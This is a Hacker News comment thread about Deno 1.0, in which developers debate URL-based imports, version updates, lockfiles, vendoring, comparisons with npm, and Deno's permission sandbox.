Do you also share these concerns about golang? Isn’t it basically the same system?


Golang does have https://proxy.golang.org/, which is fairly recent, but yes this is absolutely a problem in Go.

See the "go-bindata" problem.


This seems to be the case, yes. It's like the critics unconsciously know it's better, and that is where their energy comes from.


More like "There can't be a better stuff than what I'm accustomed to and like" feel.


> It is easy to get up-and-running quickly.

Almost all successful, mainstream, techs are like that. From a purely technical perspective, they are awful (or where awful at launch), they were just adopted because they were easy to use. When I say awful, I mean for professional use in high impact environments: financial, healthcare, automotive, etc.

Examples: VB/VBA, Javascript, PHP, MySQL, Mongo, Docker, Node.

Few people would argue that except for ease of use and ubiquity, any of these techs were superior to their competitors at launch or even a few years after.

After a while what happens is that these techs become entrenched and more serious devs have to dig in and they generally make these techs bearable. See Javascript before V8 and after, as an example.

A big chunk of the HN crowd is high powered professional developers, people working for FAANGs and startups with interesting domains. It's only normal they criticize what they consider half-baked tech.


Forget the (reasonable) security and reliability concerns people have already brought up with regard to importing bare URLs. How about just the basic features of dealing with other people's code: how am I supposed to update packages? Do we write some separate tool (but not a package management tool!) that parses out import URLs, increments the semver, and... cURLs to see if a new version exists? Like if I am currently importing "https://whatever.com/blah@1.0.1", do I just poll to see if "1.0.2" exists? Maybe check for "2.0.0" too just in case? Is the expectation that I should be checking the blogs of all these packages myself for minor updates? Then, if you get past that, you have a huge N-line change where N is every file that references that package, and thus inlines the versioning information, instead of a simple and readable one-line diff that shows "- blah: 1.0.1, + blah: 1.0.2".


Another thing is that with package.json every dependency can say which versions of its dependencies it works with. This lets you update a dependency that is used by other dependencies and only have a single version (most up to date) of it. Some package managers also let you completely override a version that one of your dependencies uses, allowing you to force the use of a newer version.

With Deno, both of these use cases seem way harder to satisfy. None of your dependencies can say "hey, I work with versions 1.1 to 1.3 of this dependency", instead they link to a hardcoded URL. The best chance of overriding or updating anything is if Deno supports a way to shim dependencies, but even then you might need to manually analyze your dependency tree and shim a whole bunch of URLs of the same library. On top of that, as soon as you update anything, your shims might be out of date and you need to go through the whole process again. To make the whole process easier, Deno could compare checksums of the dependencies it downloads and through that it could show you a list of URLs that all return the same library, but this would be like the reverse of package.json: instead of centrally managing your dependencies, you look at your dependencies after they have been imported and then try to make sense of it.


> None of your dependencies can say "hey, I work with versions 1.1 to 1.3 of this dependency"

That's a real problem that needs to be solved.

Also, what happens when two lib A and lib B depend on different versions of lib C? Each have their own scoped instance of C?


The Deno solution is either:

* A deps.ts that handles all external dependencies and re-exports them

* Import maps

Neither of these really give you a way to do the equivalent of "npm update". But I almost never want to update all my packages at once.


You don’t like checking for security updates?


Lately I just merge GitHub's pull requests for that. ;)

I don't like running "npm update" to try and get security updates, though. npm packages aren't very rigorous about PATCH level changes.


Well, at least you seem to be using cargo for the rust parts.

Since this stuff is breaking an new anyway, it would be nice to see dependency resolution and a reasonable way for historically reproducible builds (prod runs server 1.0.4 which is 5 years old, let's build that locally to do some bug fixing, using the same dependencies, gradually bringing it up to current 3.7.1...).

Sounds like the lifecycle management of deno projects will about as much fun as php before package management. And about as reliable.


I prefer a unix approach where each tool does a single thing.

The runtime does runtime things and someone can build a package manager to do package manager things.

The benefit of having runtime + package management bundled into one is you have an opinionated and standard way of doing things - the downside is if the package manager stinks then the whole ecosystem stinks.


Just come up with a convention like host a file called version.ts that lists all available versions. Brute forcing for available versions sounds dumb.


Yes, that is of course the point. There’s an infinite number of possible later versions to check for. The suggestion to poll for new versions using cURL was sarcastic. These “conventions” you speak of actually get handled by... package managers! If not everyone who hosts a package needs to “know” about magic files and make sure they make it following a spec that isn’t enforced by anyone and doesn’t break immediately but rather much later when someone tries to update. It’s like everyone managing their own database row with an informally agreed upon database schema.


Maybe a convention will arise, that you do all the imports in one file (basically like a `package.json` file) and import that from the rest of your code? It seems hackish to me but could work.


This is explicitly listed as best practice by Deno [1], but it doesn't handle the updating problem at all.

[1] https://deno.land/manual/linking_to_external_code#it-seems-u...


You have to stop thinking in terms of NPM where it takes 1000000000 packages to do anything. A Deno application is designed to be distributed as a single file. You can override the default behavior to have NPM like stupidity, but if that is really your goal why bother moving to Deno in the first place?


Forget 10000000 packages. Many languages often make use of 10s of packages. If I have several projects, each with around 10 packages, and no automated way to just check if all my projects’ respective dependencies have security updates that could be applied, it seems to go against the stated security goal.

Separately I’m not sure what is enforcing this “small dependency graph” aside from making it hard to import things I guess. I wouldn’t be surprised if you end up with the normal behavior of people coming up with cool things and other people importing them.


> and no automated way to just check if all my projects’ respective dependencies have security updates

Dependency management is a major cornerstone of any infosec program. There is more to that than just auto-installing a new dependency version.

> I’m not sure what is enforcing this “small dependency graph”

Because a large dependency graph is slow, insecure, and fragile.


> Dependency management is a major cornerstone of any infosec program. There is more to that than just auto-installing a new dependency version.

We seem to agree? I said check. It’s very useful to have something tell you what’s out of date and what the updates are.

> Because a large dependency graph is slow, insecure, and fragile.

I asked “what”, not “why”. What is enforcing this idea you have of how Deno will be used? I feel like you want it to not be used with lots of dependencies, thus aren’t accounting for how to handle them. However, just because that’s the desired way to use it doesn’t mean it will be used that way. Lots of dependencies may end up still becoming the norm, at which point you’ll wish you would have more clearly defined how it should be done instead of letting the first third party solution win (as ended up happening with npm).


Congratulations on the 1.0 release! I've been using Deno as my primary "hacking" runtime for several months now, I appreciate how quickly I can throw together a simple script and get something working. (It's even easier than ts-node, which I primarily used previously.)

I would love to see more focus in the future on the REPL in Deno. I still find myself trying things in the Node.js REPL for the autocomplete support. I'm excited to see how Deno can take advantage of native TypeScript support to make a REPL more productive: subtle type hinting, integrated tsdocs, and type-aware autocomplete (especially for a future pipeline operator).


Seconded, a Deno TS REPL would be amazing, but they probably have a few bigger fish to fry yet :)


> bigger fish to fry

> fish

I see what you did there, and I approve.


I evaluated replacing ts-node with deno but if I use -T and install ts-node globally that seems equivalent to deno to me.

I think stepping outside the npm ecosystem is going to be a bigger issue then people think.


Repl.it recently announced a Deno REPL https://repl.it/languages/deno


I really wish they had docker-compose / Terraform support. Just not sure at what point that becomes "free" hosting.


i wonder if it's conceivable to ever write typescript in a REPL


There are both ocaml and haskell repls, so it can be done with languages whose type systems are the focus. Not sure if there's anything specific about typescript that would make it hard, though.


Does anyone else see the import directly from URL as a larger security/reliability issue than the currently imperfect modules?

I'm sure I'm missing something obvious in that example, but that capability terrifies me.


I thought a lot about it, and it seems as secure as node_modules, because anybody can publish to npm anyway. You can even depend to your non-npm repo (github, urls...) from a npm-based package.

If you want to "feel" as safe, you have import maps in deno, which works like package.json.

Overall, I think Deno is more secure because it cuts the man in the middle (npm) and you can make a npm mirror with low effort, a simple fork will do. Which means you can not only precisely pin which code you want, but also make sure nobody knows you use those packages either.

Take it with an open mind, a new "JSX" or async programming moment. People will hate it, then will start to see the value of this design down the road.


> I thought a lot about it, and it seems as secure as node_modules, because anybody can publish to npm anyway

npm installs aren't the same as installing from a random URL, because:

* NPM (the org) guarantees that published versions of packages are immutable, and will never change in future. This is definitely not true for a random URL.

* NPM (the tool) stores a hash of the package in your package-lock.json, and installing via `npm ci` (which enforces the lockfile and never updates it in any case) guarantees that the package you get matches that hash.

Downloading from a random URL can return anything, at the whims of the owner, or anybody else who can successfully mitm your traffic. Installing a package via npm is the same only the very first time you ever install it. Once you've done that, and you're happy that the version you're using is safe, you have clear guarantees on future behaviour.


My assumption would be that new men in the middle will arise, but this time, you can pick which one to use.


btw: https://github.com/denoland/deno/issues/1063

they know there is a bad mitm vector and won't fix it


This is why I think a content addressable store like IPFS would shine working with Deno


That solves this specific problem nicely, although AFAIK IPFS doesn't guarantee long-term availability of any content, right? If you depend on a package version that's not sufficiently popular, it could disappear, and then you're in major trouble.

It'd be interesting to look at ways to mitigate that by requiring anybody using a package version to rehost it for others (since they have a copy locally anyway, by definition). But then you're talking about some kind of IPFS server built into your package manager, which now needs to be always running, and this starts to get seriously complicated & practically challenging...


One advantage of having a centralized repository is that the maintainers of that repository have the ability to remove genuinely malicious changes (even if it's at the expense of breaking builds). Eliminating the middle man isn't always a great thing when one of the people on the end is acting maliciously.


I'm just thinking out loud here, but it seems to me that you could just make sure you're importing all your dependencies from trusted package repos, right? And since the URL for a package is right there in the `import` statement, it seems like it'd be pretty easy to lint for untrusted imports.

I don't detest NPM in the way that some people do, but I have always worried about the implications of the fact that nearly the entire community relies on their registry. If they ever fell over completely, they would have hamstrung a huge amount of the JS community.


It's basically the same "exposure" as importing a random npm, but it has the benefit if being explicit when you do it.

It's also exactly what the websites you visit do. ;)


> It's basically the same "exposure" as importing a random npm, but it has the benefit if being explicit when you do it.

This is definitely false. For all the problems with the NPM registry and the Node dependency situation, an NPM package at a specific version is not just at the whims of whatever happens to be at the other end of a URL at any given moment it's requested. This is a huge vulnerability that the Node/NPM world does not currently have.


That is a fair point. I don't think most people who use npms really pay much attention, though, and you're still just an npm update away from getting something unexpected (because really, who puts explicit versions in package.json?).

Deno does have lockfiles: https://deno.land/manual/linking_to_external_code/integrity_...

I prefer imports from URLs. And I loathe npm. I get why people would disagree though.


Deno has lock files and caches files locally on first import.


I'm not sure how a lock file would help in this scenario, unless you're also committing your cache to source control (like a lot of folks did in the bad old days of NPM). The local cache is great, but that doesn't prevent the content of those URLs changing for someone who doesn't have access to your cache.


yeah, but we regularly clear out our cache and lock files, so this doesn't really solve the issue, unless you're commiting all of your packages


Why are you _regularly_ clearing lock files? If you're bypassing lock files you're going to have the exact same issue with npm or yarn or any other package manager that downloads from the internet.


Dunno about OP but I pin versions in package.json because it allows me to control the versions and upgrade major versions only when explicit and necessary, and rely only on the lock file to keep it the same between commit time and the production build.


That doesn’t actually work and gives you a false sense of reproducibility and stability. Sure your top level dependencies might not change without explicit changes to package.json but every time you run npm install without a lock file all transitive dependencies are re-resolved and can change.

Always commit your lock files people


What about the dependencies of your dependencies? You're gonna get burned when a breaking change gets introduced a few levels deeper than your package.json. Not everyone follows semver perfectly, and sometimes malicious code gets distributed as one of these transitive dependencies.


That's fine for one developer pushing to production from their own machine. But I've you have aCI server and you're working with other people you're going to want to know that everyone is working with the same modules.


What! Clearing lock files seems wild. How do you know you're getting the right code when you install dependencies?


For Deno the only issue is the first time when you do not have it cached. Deno compiles in all dependencies when building so the only point of failure is the machine you’re building on.

I don’t know the state of the art anymore, but I’m sure they have ways to make it easy to vendor deps in the repo.


> It's basically the same "exposure" as importing a random npm, but it has the benefit if being explicit when you do it.

I'm not sure how this works in detail here, but at least in NPM you got a chance to download packages, inspect them and fix the versions if so desired. Importantly, this gave you control over your transitive dependencies as well.

This seems more like the curl | bash school of package management.

Edit: This is explained in more detail at https://deno.land/manual/linking_to_external_code and indeed seems a lot more sane.

> It's also exactly what the websites you visit do. ;)

Well yes, and it causes huge problems there already - see the whole mess we have with trackers and page bloat.


The good thing about this is you can effectively build a register service that serves the same level of trust that npm provides, because at the end of the day that is the only deferential in this scenario as npm can just as well return malicious code.


Thanks for sharing that link. Seems much more sane, but not without issues. I'm sure this will continue to be iterated upon.

Even with all NPMs flaws, I do feel this is a bit of throwing the baby out with the bath water. Time will tell.


AFAIK there is no option to allow a website to read and write random files anywhere to my hard drive period. At most a website can ask the user select a file or offer one for downloading. In the future maybe it can be given a domain specific folder.

That's not true here. If I'm running a web server I'm going to need to give the app permission to read the files being served and access to the database. That something that never happens in the browser.


The tldr is Deno also gives you a chance to download + inspect packages, and then lock dependencies. The mechanism for import is different, but the tooling is good.


Sure do. I wonder if they have a checksum mechanism like browsers do?

You can add an “integrity” attribute to script tags in the browser.

https://developer.mozilla.org/en-US/docs/Web/Security/Subres...


One advantage of urls is that you can link to a specific git sha, tag, or branch for a dependency, e.g. on github.


So exactly like existing tooling can already do, then?


Sure, I probably phrased that poorly -- it's not a unique advantage, but benefit of having URLs be the only way to link to dependencies versus a centralized, dominant package manager.


It's not just about the integrity. The url may very well provide what they claim to provide, so checksums would match, but it's the direct downloading and running of remote code that is terrifying.

This is pretty much like all the bash one-liners piping and executing a curl/wget download. I understand there are sandbox restrictions, but are the restrictions on a per dependency level, or on a program level?

If they are on a program level, they are essentially useless, since the first thing I'm going to do is break out of the sandbox to let my program do whatever it needs to do (read fs/network etc.). If it is on a per dependency level, then am I really expected to manage sandbox permissions for all of my projects dependencies?


If you afraid of "direct" downloading and executing some of that code, then what do you think happen when you npm install/pip install a package? I'm very interested if you can expose a new attack vector that didn't exist with the previous solutions.


You can generate modules on the fly on the server, that require next generated module recursively blowing up your disk space. If deno stores those files uncompressed, you can generate module full of comments/zeros so it compresses very well for attacker and eats a lot of space on consumer side.


Does Deno have some built in way to vendor / download the imports pre-execution? I don't want my production service to fail to launch because some random repo is offline.



Yup! Deno caches remote imports.

https://deno.land/manual/linking_to_external_code


You can also use the built in bundle command to bundle all of your dependencies and your code into a single, easily deployable file. https://deno.land/manual/tools/bundler.


Deno caches local copies and offer control on when to reload them. in term of vendoring you can simply download everything yourself and use local paths for imports.


How would this work with transitive dependencies? Sure I can control which parts I import myself, but how do I keep a vendored file from pulling in another URL a level deeper?


Unlike node, recommended deno practice is to check-in your dependencies to the VCS.

> Production software should always bundle its dependencies. In Deno this is done by checking the $DENO_DIR into your source control system, and specifying that path as the $DENO_DIR environmental variable at runtime.

https://deno.land/manual/linking_to_external_code


    du -hs node_modules
    
    1.7G node_modules


> in term of vendoring you can simply download everything yourself and use local paths for imports.

So I basically have to do manually, what NPM/yarn do for me already?


I do not speak for the project, but based on my understanding part of the point was to avoid the magic of npm.

You can use lock-files, bundles, and many other features that makes dependencies management easier.


Ah from that perspective I can see how this might appear to be better. Personally, I like the 'magic' of NPM (which to be honest I don't really think is all that magical, it's quite transparent what's happening behind the scenes). This 'magic' means I no longer have to write 200 line makefiles, so it definitely makes my life easier.


Some of that convenience will still be included, a couple of things that deno will do differently from node will be that there is no standard index.* file to load and import path include the extension.


I assume you would just download the packages and serve them yourself.


espacially since https is not enforced! https://github.com/denoland/deno/issues/1063


CMIIW, wouldn't enforced https means you can't use intranet or localhost url?


you could use a flag to re-enable http :)


More than likely programming as a whole will get better because of this...

Do you trust this thing? Better off developing it yourself, or working with something you trust then.


deno requires that you give the process explicitly which permissions it has. I think it's much better than praying that a package has not gone rough like with node. If you don't trust the remote script, run it without any permission and capture the output. Using multiple process with explicit permissions are much safer.


I'm wondering about the practicality of importing from URLs. I didn't see it addressed, but an import like this will be awfully hard to remember.

    import { serve } from "https://deno.land/std@0.50.0/http/server.ts";
Anyone know if there are alternatives or a plan for this aside from "use an IDE to remember it for you"?


The convention is to make a `deps.ts` and re-export what you need. Like this: https://deno.land/x/collections/deps.ts

I don't find versioned URLs much more difficult to work with than package@<version> though.


i'm wondering if they'll end up adding a 'dependencies.json' to eliminate the boilerplate from 'deps.ts' and to simplify tooling. that'd be revolutionary! ;)

jokes aside, i wonder how import-via-url will impact tooling. having to parse arbitrary JS (or even run it, for dynamic imports?) seems like it'd make writing a "list all dependencies" tool much harder than a "dumb" JSON/TOML/whatever file would. though i guess Go does a similar thing, and afaik they're fine


Well they do have import maps! I think everyone likes shorthand package names.


You are not alone, this is very unsafe in my humble opinion.


How is it any different than how it works in the browser?


Does it also terrify you when code running in a browser does it?


The code running in my browser isn't a multi-tenant production server, with access to the filesystem and DBs.


Except that with Deno, everything IO related is turned off by default and has to be granted access before it becomes a process. It's the first bullet point on the landing page.

Here is the page with more detail. https://deno.land/manual/getting_started/permissions

It can even restrict access down to a specific directory or host. This is cool.

Whereas any NPM module can map your subnet, lift your .ssh directory, and yoink environment variables, wily-nily.

It's happened before.


That still doesn't prevent imported modules from yoinking anything you did grant access to, though. For instance, if my service connects to a DB then `uuid` can slurp the contents.

It'd be nice to have some capability model where modules can only access things through handles passed to them, but probably infeasible for a project like this.


You can actually run things as Workers in Deno and get some sandboxing abilities: https://github.com/denoland/deno/blob/master/docs/runtime/wo...


From the article: "Also like browsers, code is executed in a secure sandbox by default. Scripts cannot access the hard drive, open network connections, or make any other potentially malicious actions without permission."


That just means you have to run with the -http -fs, etc. flags. But you are using those when writing any nontrivial Deno app like a webserver anyways.

"web browsers already do this ;)" isn't a good comparison.


"But I have to turn all that stuff on" is also not a good comparison.

Actually, no Deno webserver I've written gets fs access. Some only get --allow-net.


I think that's the main selling point of deno, sandboxing.


Guidelines | FAQ | Support | API | Security | Lists | Bookmarklet | Legal | Apply to YC | Contact

Search: